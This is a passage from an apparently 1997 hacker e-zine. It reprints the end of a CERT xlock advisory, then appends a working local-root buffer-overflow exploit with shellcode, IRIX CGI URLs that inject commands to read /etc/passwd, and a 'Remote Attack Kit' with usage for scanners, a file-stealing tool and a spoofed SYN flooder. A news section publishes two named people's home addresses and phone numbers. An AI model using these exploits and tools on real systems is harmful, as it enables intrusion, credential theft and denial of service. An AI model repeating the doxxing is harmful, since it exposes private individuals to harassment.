disable any copies of xlock that exist on your system and that have the setuid or setgid bits set. 2. Install a version of xlock known to be immune to this vulnerablility. One such supported tool is xlockmore. The latest version of this tool is 4.02, and you should ensure that this is the version you are using. This utility can be obtained from the following site: ftp://ftp.x.org/contrib/applications/xlockmore-4.02.tar.gz MD5 (xlockmore-4.02.tar.gz) = c158e6b4b99b3cff4b52b39219dbfe0e You can also obtain this version from mirror sites. A list of these sites will be displayed if you are not able to access the above archive due to load. ........................................................................... Appendix A - Vendor Information Below is a list of the vendors who have provided information for this advisory. We will update this appendix as we receive additional information. If you do not see your vendor's name, the CERT/CC did not hear from that vendor. Please contact the vendor directly. Berkeley Software Design, Inc. (BSDI) ===================================== BSD/OS is not vulnerable to the problem in xlock since our xlock is not setuid. Cray Research - A Silicon Graphics Company ========================================== Cray Research does not include xlock in its X Window releases, so we are not at risk on the xlock buffer overflow problem. Data General Corporation ======================== The xlock sources (xlockmore-3.7) that DG includes in its contributed software package have been modified to remove this vulnerability. These will be available when release 8 comes out. We also recommend that our customers who have the current version should change the sprintf calls in resource.c to snprintf calls, rebuild and reinstall the package. Digital Equipment Corporation ============================= This reported problem is not present for Digital's ULTRIX or Digital UNIX Operating Systems Software. FreeBSD, Inc. ============= The xlockmore version we ship in our ports collection is vulnerable in all shipped releases. The port in FreeBSD-current is fixed. Solution is to install the latest xlockmore version (4.02). Hewlett-Packard Company ======================= We ship an suid root program vuelock that is based on xlock. It does have the vulnerability. The only workaround is to remove the executable, the patch is "in process". IBM Corporation =============== AIX is vulnerable to the conditions described in this advisory. The following APARs will be released soon: AIX 3.2: APAR IX68189 AIX 4.1: APAR IX68190 AIX 4.2: APAR IX68191 IBM and AIX are registered trademarks of International Business Machines Corporation. LINUX ===== Red Hat: Not vulnerable Caldera: Not vulnerable Debian: An updated package is on the Debian site SuSE: ftp://ftp.suse.com/pub/SuSE-Linux/suse_update/S.u.S.E.-4.4.1/xap1/xlock And in general the new Xlockmore release fixes the problems. NEC Corporation =============== UX/4800 Not vulnerable for all versions. EWS-UX/V(Rel4.2MP) Not vulnerable for all versions. EWS-UX/V(Rel4.2) Not vulnerable for all versions. UP-UX/V(Rel4.2MP) Not vulnerable for all versions. The Open Group ============== Publicly available software that was formerly distributed by the X Consortium - Not vulnerable. Solbourne ========= Solbourne is not vulnerable to this attack. Sun Microsystems, Inc. ====================== We are producing patches for OpenWindows 3.0 for Sun OS versions 4.1.3_U1, 4.1.4, 5.3, 5.4, 5.5, and 5.5.1. ------------------------------------------------------------------------------- The CERT Coordination Center thanks David Hedley for reporting the original problem and Kaleb Keithley at The Open Group for his support in the development of this advisory. ------------------------------------------------------------------------------- If you believe that your system has been compromised, contact the CERT Coordination Center or your representative in the Forum of Incident Response and Security Teams (see http://www.first.org/team-info/). CERT/CC Contact Information ------------------------------ Email cert@cert.org Phone +1 412-268-7090 (24-hour hotline) CERT personnel answer 8:30-5:00 p.m. EST(GMT-5) / EDT(GMT-4) and are on call for emergencies during other hours. Fax +1 412-268-6989 Postal address CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh PA 15213-3890 USA Using encryption We strongly urge you to encrypt sensitive information sent by email. We can support a shared DES key or PGP. Contact the CERT/CC for more information. Location of CERT PGP key ftp://info.cert.org/pub/CERT_PGP.key Getting security information CERT publications and other security information are available from http://www.cert.org/ ftp://info.cert.org/pub/ CERT advisories and bulletins are also posted on the USENET newsgroup comp.security.announce To be added to our mailing list for advisories and bulletins, send email to cert-advisory-request@cert.org In the subject line, type SUBSCRIBE your-email-address ------------------------------------------------------------------------------- * Registered U.S. Patent and Trademark Office. Copyright 1997 Carnegie Mellon University This material may be reproduced and distributed without permission provided it is used for noncommercial purposes and the copyright statement is included. The CERT Coordination Center is part of the Software Engineering Institute (SEI). The SEI is sponsored by the U.S. Department of Defense. ------------------------------------------------------------------------------- This file: ftp://info.cert.org/pub/cert_advisories/CA-97.13.xlock http://www.cert.org click on "CERT Advisories" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Revision history -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBM3DOFnVP+x0t4w7BAQH9MwQAwULlCDTqDbW+CiS0/Z36BtGf6Eqzx43B pEt72rQlQbw2AqRnHeq85dzVUB4eKmL0T//bGYyo0sCt+8nlFaS3cNYh0cyl3jdu JPDVoNhWB7v2+8nHvAEDz2UdomNVaxXDFvAbZ9JvEk/Ex6aFiXtl4qXdjxtcC4ze kGKLcu0+LzE= =nF5B -----END PGP SIGNATURE----- ------------------------------------------------------------------------------ The Exploit Code - not in the *ORIGINAL* CERT advisory ;] : ------------------------------------------------------------------------------ /* x86 XLOCK overflow exploit by cesaro@0wned.org 4/17/97 Original exploit framework - lpr exploit Usage: make xlock-exploit xlock-exploit Assumptions: xlock is suid root, and installed in /usr/X11/bin */ #include #include #include #define DEFAULT_OFFSET 50 #define BUFFER_SIZE 996 long get_esp(void) { __asm__("movl %esp,%eax\n"); } int main(int argc, char *argv[]) { char *buff = NULL; unsigned long *addr_ptr = NULL; char *ptr = NULL; int dfltOFFSET = DEFAULT_OFFSET; u_char execshell[] = "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07" "\x89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12" "\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80\xe8" "\xd7\xff\xff\xff/bin/sh"; int i; if (argc > 1) dfltOFFSET = atoi(argv[1]); else printf("You can specify another offset as a parameter if you need...\n"); buff = malloc(4096); if(!buff) { printf("can't allocate memory\n"); exit(0); } ptr = buff; memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell)); ptr += BUFFER_SIZE-strlen(execshell); for(i=0;i < strlen(execshell);i++) *(ptr++) = execshell[i]; addr_ptr = (long *)ptr; for(i=0;i<2;i++) *(addr_ptr++) = get_esp() + dfltOFFSET; ptr = (char *)addr_ptr; *ptr = 0; execl("/usr/X11/bin/xlock", "xlock", "-nolock", "-name", buff, NULL); } ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 8. IRiX WWW Server Bugs : Tetsu Khan ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Number 1 : ---------- http://www.site.com/cgi-bin/wrap?/etc ...Lets you view the contents of the /etc/ directory, you can try others too.. Number 2 : ---------- http://www.site.com/cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd ...Lets you view the /etc/passwd file, also try /etc/hosts to make sure the cgi script isn't a trap. You can also execute some kind of remote shell using webdist technique, but we are looking into it now... ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 9. Hacking Not-So-Electrical Items : Tetsu Khan ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ y0h CrEw!@# T0daY wE WiLL LeArN tEw Hax0r.... TrEES!!! tReEs!!! TrEEs!!! TrEES!!! tReEs!!! TrEEs!!! TrEES!!! tReEs!!! TrEEs!!! YePpO! TrEEs! LiKe Da oNeZ j00 FiNd In YeR GaRdEn SoMeTiMeS!! oKaY, HeRe aRe THe k-LEeTo JuaReZ YeW wILL nEEd... 1 : A HaCk SaW 2 : CoMoFlAgUeD CLoThiNG 3 : a CoPPeR NaiL 4 : A hAmmER 5 : a GI-JoE AcTiOn FiGuRe (WiTH pArAChUte) 6 : a SmALL, wELL TrAiNeD InSecT, LiKe A bEE 7 : oNe LaPtOp ComPUtEr (wIv d0S 2.4 *OnLy*) 8 : OnE RS232 CaBlE OkAy CrEw! ThIs iS Da mAsTA PlAn!@# FiRsTly, aS WiTH mANy OtHer HaCks YoU WiLL nEEd tO ScAn Da PoRts Of ThE TrEE, dO ThIs By UsIng tHE SmALL, wELL TrAiNeD InSecT, LiKe A bEE, aS bEE's aRe ThE BeSt At SCannInG HiDDen PoRtz, WhEn ThE bEE HaS fOuND sOmE kEwL PoRtS (UsuALLy aT dA tOp oF Da TrEE) tIe ThE GI-JoE AcTiOn FiGuRe tO ThE bEE, aNd gEt HiM To PuT YeR Rs232 CaBle Up ThErE sO YeW CaN AcCesS dA PoRt Of Da TrEE! WhEn ThE rS232 cAbLE iS In pLACe, PuT oN ThE CaMofLAUgEd CloTHIng, AnD HiDe BeHiNd A bUsH WiTh YoUr LaPtOP, ThEn GeT ThE GI-JoE AcTiOn FiGuRe To PaRAcHute d0Wn dA TrEE, aNd GiVe YoU ThE OTheR EnD Of dA Rs232 CaBLe, ThEn gO InTo DoS AnD RuN tHiS PrOgRam In Gw-BASiC... 10 OPEN (COM PORT AND STUFF) 20 DATA "GIVE ME ALL YOUR K-LEET JUAREZ AND STUFF NOW, BECAUSE I OWN J00" 30 OPEN (ANOTHER PORT AND STUFF) 40 DATA "EYE BE W00PIN J00 F00L, PHEAR MUH ELEETNESS" 50 GOTO 10 ThIs ShOuLd cRaSh ThE TrEE, LeAvInG iT OpEn tO AtTaCk, NeXt TaKE ThE HaCk SaW AnD StArT cUtTiNg The BaRK oFF ThE TrEE (OnLy iN oNe pLaCe) ThE BArk AcTs LiKe a FiRewALL, AnD sO It MuSt Be tAkeN DoWN FirSt. NeXt CHecK On YoUr LaPtOp WheThEr ThE TrEE HaS GiVen yEw eLeeT JuArEz, iF NoT ThEN uSe The CoPPeR nAiL to rm -rf / ThE TrEE, HaMmEr The CoPPeR nAiL InTo The TrEE, AnD ThE TrEE WiLL bE rm'd WitHiN aBOUt A wEEk (dEw TeW 99999999999999 GB HaRd dRivE SPaCe) hAvE PhUn! MoRe NoT-So-LeCtiCaL iTeMz NeXt TimE!@~^&* TeEkAy. ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ =============================================================================== ==[ NEWS ]=====================[ .SECTION E. ]=======================[ NEWS ]== =============================================================================== ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 1. Amnesty International Hacked : Article From cnet.com ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ http://www.news.com/News/Item/0,4,10135,00.html Amnesty International hacked By Janet Kornblum April 28, 1997, 3:15 p.m. PT Hackers broke into the Amnesty International home page over the weekend, altering it with a highly stylized, futuristic-looking graphic of a small child or baby smoking a cigarette. Amnesty International didn't know what the perpetrators wanted to accomplish with the hacking, which was strikingly apolitical considering the political nature of the target. Above the picture, the altered Web page read, "Who laughs last? We are the 4 man dream team, just proving one of many points." But just what those points were was lost on many, not the least of whom was Mike Blackstock, the system administrator for Ontario Internet Link, the small Canadian Internet service provider that hosts the Amnesty site for free. "As far as I can tell, they didn't do anything malicious," he said. "They replaced one page of Amnesty with a silly graphic of a kid smoking. This was not political as far as I could tell. The only politics I could think of was cigarettes." Beneath the picture, the page is signed, "Thanx to: so1o, modeX, XFli, mstrhelix...CodeZero uber alles!" This hack appears to be unrelated to other recent high-profile incidents, including one last week in which a Portuguese group broke in to Indonesian government Web pages to protest its treatment of East Timor. In that case, the hackers--referred to by many as "crackers" because they crack into systems--were quite clear about the reasons behind their action. In the case of the Amnesty page, Blackstone said the hackers only altered the Web page and did not cause major damage, though they could have done so if they wanted to. The altered page was up for a few hours, he said. Blackstone was busy plugging the security hole but pointed out that sites much bigger with higher profiles, such as the Air Force, the Central Intelligence Agency, and the Justice Department, also have been hacked. ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 2. //sToRm// Of sIn Rips Port Pro : so1o ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Ummmm, on www.sinnerz.com //sToRm// has a lamefuck page with his k-leet w1nd0ze '95 juarez, coded in Visual Basic, with his "VB For Dummies" book, which include... DrSpewfy : Pile'O'Crap, why not get a nameserver and sirc? and actually be able to talk to people? DCCNewk : Chargen Flood? why not try like, SYN FLOOD? d0h.. Port Pro : Okay, original Port Pro is SHAREWARE, made by Blue Byte Software, and it is SOOO obvious that //sToRm// just did a little bit of hex editing, and B00oo00m! hes changed the authors name and shit to his own! but ummm, because of his EXTREME lameness, he didn't know how to change the program name, the version and the general interface and look of the program, what a LAME FUCK. I'm sure he will have Blue Byte on his fucking ass with Copyright and shit. h0h0h0h0h0!@# I doubt //sToRm// coded *ANYTHING* on that page, as DrSpewfy is just shit, and DCCNewk is just like the DCC Nuking code we put out in the CodeZero Technical Journal Issue 2 :) ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 3. Digital Darkness Lives : so1o ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ It looked as if the DD wouldn't bring out a magazine this month, but they got a huge influx of submissions and live another day!@# if you want to submit anything for DD, mail spamman@erols.com or spaman@erols.com 'cos I ain't shure. Visit their page too : http://dd.home.ml.org ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 4. /home/sdr 0wned : so1o ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ sdr, a user of duncan.nac.net (owned by bspline - where all the cool people on efnet have their shells) was playing with the permissions in his home directory and he accidentally made the whole directory world readable, so then cold blood and others got all of sdr's k-leet y00nix juarez, and tar'd + gz'd them up and were distributing the sdr.tar.gz in #hack using XDCC :) ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 5. Sendmail 8.8.4 Remote Is Out : so1o ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Yep, its been confirmed, the sendmail 884 remote exploit for ALL OS's is now out, there was some delay in r00t members getting the offsets needed for each Operating System, but now the technique is complete, and many 8.8.4 systems are vunerable. Sendmail 8.8.5 remote exploits are being looked into now. ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 6. sIn inf0z Part 2 : The CodeZero ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ------------------------------------------------------------------------------- =-= w0wie!@# we g0t 2 n0w!! =-= ------------------------------------------------------------------------------- Alias : Evil Chick Real Name : Suzette Kimminau Address : 130 105th Ave. S.E. Apt. 218 Bellevue, Wa 98004 USA Telephone : (206)454-7176 Email : evilchic@NWLINK.COM ------------------------------------------------------------------------------- Alias : \\StOrM\\ Real Name : Jason Sloderbeck Address : 5739 N Norton, Kansas City, MO 64119 USA Telephone : (816)453-8722 Email : storm@SINNERZ.COM ------------------------------------------------------------------------------- aS wE PrOMiSeD LasT t1me! eXpect m0re s00n! ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ =============================================================================== ==[ PROJECTS ]=================[ .SECTION F. ]===================[ PROJECTS ]== =============================================================================== ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ -/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/\-\=\-\=\-\=\-\=\-\=\-\=\-\=\-\=\-\=\ =/-/=/-/=/-/=/-/=/-/=/-/ so1o of The CodeZero presents. \-\=\-\=\-\=\-\=\-\=\-\= -/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/\-\=\-\=\-\=\-\=\-\=\-\=\-\=\-\=\-\=\ =/-/=/-/=/-/=/-/=/-/=/-/ The CodeZero \-\=\-\=\-\=\-\=\-\=\-\= =/-/=/-/=/-/=/-/=/-/=/-/ Remote Attack Kit. \-\=\-\=\-\=\-\=\-\=\-\= =/-/=/-/=/-/=/-/=/-/=/-/ [CRAK] \-\=\-\=\-\=\-\=\-\=\-\= -/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/\-\=\-\=\-\=\-\=\-\=\-\=\-\=\-\=\-\=\ =/-/=/-/=/-/=/-/=/-/=/-/ .:. -=10/05/97=- .:. \-\=\-\=\-\=\-\=\-\=\-\= -/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/\-\=\-\=\-\=\-\=\-\=\-\=\-\=\-\=\-\=\ ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ w00 w00!! Now you can have k-leet skills like me! Firstly upload the crak.tar to a linux 2.0.x system, or to your own, then tar -xvf crack.tar to unzip the file, then move the files around and shit if you want to, then you're ready to go! Expect OS specific kits in later issues...And Multi-Scan s00n. =============================================================================== The Contents Of The Kit : =============================================================================== dnsscan : Mass DNS query program, gets lists of systems in entire countries, or all the systems on a network, like *.microsoft.com. phpscan : Scans hosts from a file and outputs a list of php vunerable sites. phpget : Gets files from php vunerable servers. phfscan : Scans hosts from a file and outputs a list of php vunerable sites. ident-scan: Scans all daemons running on ports and determines cool stuff. tcpprobe : Very simple portscanner. fingah : Uses an apache hole to finger systems if port 79 isnt open. synk4 : SYN flooder, basically kicks the shit out of systems. =============================================================================== Usages : =============================================================================== Use this command to unzip the crak.tar... % tar -xvf crak.tar then it will be copied into /crak, depending on the working directory.. DNSscan : --------- Usage: dnscan [-file ] [-domain ] [-sub ] -file Usages as a list of subdomains and servers to scan. -domain Lists all servers in a first level domain like com or net. -subdomain Lists all servers in a domain. The -domain mode will first create a file called 'domain.' with a list of all subdomains and their name servers, and then use that file in the -file mode. The input file needs to have the following format: [] To list all servers in Japan, do "dnscan -domain jp" To list all servers in the netcom domain, do "dnscan -sub netcom.com" PHPscan : --------- phpscan eg. phpscan domains.txt phpvunerable.txt PHPget : -------- phpget eg. phpget www.p1.com /etc/passwd PHFscan : --------- phfscan eg. phfscan domains.txt phfvunerable.txt Ident-Scan : ------------ ident-scan [low port] [high port] eg. ident-scan warped.arc.nasa.gov 1 9999 TCPprobe : ---------- tcpprobe eg. tcpprobe microsoft.com Fingah : -------- fingah eg. fingah www.p1.com root Synk4 : ------- synk4 if you use 0 as the source address, its puts the syn flooder into random ip mode, where the packets are sent from many different random sites. eg. synk4 0 fucked.com 1 23 Have Phun!@# =============================================================================== Where To Get CRAK.tar : Under CodeZero Linux Tools Section on www.codez.com =============================================================================== It can be unzipped with WinZip if you are in W1nd0ze too.. :) ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ =============================================================================== ==[ FIN ]======================[ .SECTION G. ]========================[ FIN ]== =============================================================================== ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Well, that was issue 2, hope ya'll liked it, don't forget to visit... AnD ReMeMBer To LiNk To iT FrOm YouR SiTeZ!! =====================> http://www.codez.com NOW UP!@#* <===================== =====================> http://www.codez.com NOW UP!@#* <===================== =====================> http://www.codez.com NOW UP!@#* <===================== Until next time, when there will be 900 days until the year 2000... The CodeZero. =============================================================================== =====================> http://www.codez.com NOW UP!@#* <===================== =============================================================================== ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Remember, McDonalds Owns You, And Ronald Is The KinG!!! Wendy Is Satan!! Don't Believe The Lies!! PHEAR WENDY!@#* ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ